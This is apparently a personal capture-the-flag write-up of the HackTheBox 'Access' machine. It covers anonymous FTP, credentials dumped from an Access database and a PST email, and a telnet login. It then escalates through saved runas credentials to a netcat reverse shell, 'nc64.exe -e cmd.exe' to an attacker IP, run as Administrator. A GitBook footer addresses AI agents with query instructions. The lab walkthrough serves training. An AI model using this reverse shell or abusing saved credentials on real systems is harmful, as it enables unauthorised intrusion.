> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/ippsec-unofficial-cpts-prep/htb-access.md).

# HTB - Access

```bash
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
23/tcp open  telnet  Microsoft Windows XP telnetd
80/tcp open  http    Microsoft IIS httpd 7.5
```

## FTP

```bash
┌──(ajay㉿kali)-[~]
└─$ ftp 10.129.11.174              
Connected to 10.129.11.174.
220 Microsoft FTP Service
Name (10.129.11.174:ajay): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
425 Cannot open data connection.
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  09:16PM       <DIR>          Backups
08-24-18  10:00PM       <DIR>          Engineer
226 Transfer complete.
ftp> 
```

anonymous access granted. With this access downlaod the files in both the directories and investigate further.

```bash
ftp> binary
200 Type set to I.
ftp> get "Access Control.zip"
local: Access Control.zip remote: Access Control.zip
200 PORT command successful.
125 Data connection already open; Transfer starting.
100% |***********************************************************************| 10870       79.13 KiB/s    00:00 ETA
226 Transfer complete.
10870 bytes received in 00:00 (78.93 KiB/s)
ftp> cd Backups
ftp> get backup.mdb
local: backup.mdb remote: backup.mdb
200 PORT command successful.
125 Data connection already open; Transfer starting.
100% |***********************************************************************|  5520 KiB    1.02 MiB/s    00:00 ETA
226 Transfer complete.
5652480 bytes received in 00:05 (1.02 MiB/s)

```

Access control is encrypted with a password tried cracking with john but no result..

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F8DuO1CeT0l9CYOKG3sKk%2Fimage.png?alt=media&amp;token=c096e45e-a743-4523-833a-3cb8fa56c955" alt=""><figcaption></figcaption></figure>

there is also a `backup.mdb` file which we can read to get more detail

### Reading mdb Files

We can read the file using `md-tables`

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FVcajMC3QmHxhJehvE5oF%2Fimage.png?alt=media&amp;token=0ec7b947-8666-42c8-babb-84681836e596" alt=""><figcaption></figcaption></figure>

there is lot of information i need to find a to understand the data correctly.

i will use the below for loop to display all the tables and no of records they have in separate line and exclude all others which have 0 records.

```bash
──(ajay㉿kali)-[~]
└─$ for table in $(mdb-tables backup.mdb); do
    count=$(mdb-export backup.mdb "$table" | tail -n +2 | wc -l)
    if [ "$count" -gt 0 ]; then
        echo "$table: $count records"
    fi
done
acc_timeseg: 1 records
acc_wiegandfmt: 11 records
ACGroup: 5 records
action_log: 24 records
areaadmin: 3 records
auth_user: 3 records
DEPARTMENTS: 5 records
deptadmin: 7 records
LeaveClass: 3 records
LeaveClass1: 15 records
personnel_area: 1 records
TBKEY: 3 records
USERINFO: 5 records
ACUnlockComb: 10 records
AttParam: 19 records
auth_group: 1 records
SystemLog: 1 records
```

`auth_user` has 3 system login users

```bash
──(ajay㉿kali)-[~]
└─$ mdb-export backup.mdb auth_user
id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,
```

tried using all the passwords aganist telnet to login but none worked but i can used the password for engineer to unzip the zip file it worked.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fb75Z1f35m0gkmFTHDJFb%2Fimage.png?alt=media&amp;token=8dcc883e-c2c7-482b-a664-2b957db546bb" alt=""><figcaption></figcaption></figure>

i can read the pst file using readpst.

### Reading .PST Files

```bash
┌──(ajay㉿kali)-[~]
└─$ mkdir pst_output
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ readpst -o pst_output "Access Control.pst"
Opening PST file and indexes...
Processing Folder "Deleted Items"
        "Access Control" - 2 items done, 0 items skipped.
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ ls pst_output/
'Access Control.mbox'
```

```bash
──(ajay㉿kali)-[~/pst_output]
└─$ cat Access\ Control.mbox 
From "john@megacorp.com" Thu Aug 23 19:44:07 2018
Status: RO
From: john@megacorp.com <john@megacorp.com>
Subject: MegaCorp Access Control System "security" account
To: 'security@accesscontrolsystems.com'
Date: Thu, 23 Aug 2018 23:44:07 +0000
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--boundary-LibPST-iamunique-88093843_-_-"


----boundary-LibPST-iamunique-88093843_-_-
Content-Type: multipart/alternative;
        boundary="alt---boundary-LibPST-iamunique-88093843_-_-"

--alt---boundary-LibPST-iamunique-88093843_-_-
Content-Type: text/plain; charset="utf-8"

Hi there,

 

The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.

 

Regards,

John
<SNIP>

----boundary-LibPST-iamunique-88093843_-_---

                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~/pst_output]

```

`security : 4Cc3ssC0ntr0ller`

## Shell as Security through Telnet

With the new creds got shell access through telnet.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FNeTSyyJ3FcnLHiBUD2wE%2Fimage.png?alt=media&amp;token=5c312f25-5ddc-4c9d-be13-994742c9d799" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FhNnCDeifzGikpvKUkUe0%2Fimage.png?alt=media&amp;token=0df88de3-776b-4d8b-81ac-cfddcd28d0c9" alt=""><figcaption></figcaption></figure>

found an lnk file in the public user desktop directory.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FHXIag6YOzt0QyHsYxarT%2Fimage.png?alt=media&amp;token=aa4b9833-e11c-4388-95d5-a6acfdb97e8e" alt=""><figcaption></figcaption></figure>

the file revealed some interesting details.

```bash
C:\Users\Public\Desktop>type "ZKAccess3.5 Security System.lnk"
runas.exe���:1��:1�*Yrunas.exe▒L-K��E�C:\Windows\System32\runas.exe#..\..\..\Windows\System32\runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"'C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico�%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico�%�
```

* `/savecred` means the **Administrator password is saved** on this machine
* It runs as `ACCESS\\Administrator` automatically without asking for a password
* You can **abuse this** to run anything as Administrator!

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FtAxebQIvnKaKVoPDCA8r%2Fimage.png?alt=media&amp;token=9e669d21-8610-43fd-8526-a3b6b76bc01f" alt=""><figcaption></figcaption></figure>

### Abusing cmdkey (saved passwords)

We can abuse the saved credentials to give us a reverse shell by uploading netcat to the machine and using runas to give us shell.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F2prtC4wZRGFRHlzOZFAr%2Fimage.png?alt=media&amp;token=b1846fd7-0739-4442-aee7-5260d43c0b85" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FL8aF5PwluGmR6BSzDZFa%2Fimage.png?alt=media&amp;token=0fc1c1d8-d98a-4c20-ac86-5186205e96a6" alt=""><figcaption></figcaption></figure>

run the below command to get shell

```bash
runas /user:ACCESS\Administrator /savecred "C:\Users\Public\nc64.exe -e cmd.exe 10.10.15.204 6666"
```

## Shell as Administrator

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fxd4hWwbwcAUdciAnt5CB%2Fimage.png?alt=media&amp;token=a9aee845-ff34-4075-aded-18af03f4e8da" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fj6N9pswokBWck4BMJM5U%2Fimage.png?alt=media&amp;token=0aa6a190-0a78-4ef3-8235-7e508daf5cb1" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/ippsec-unofficial-cpts-prep/htb-access.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
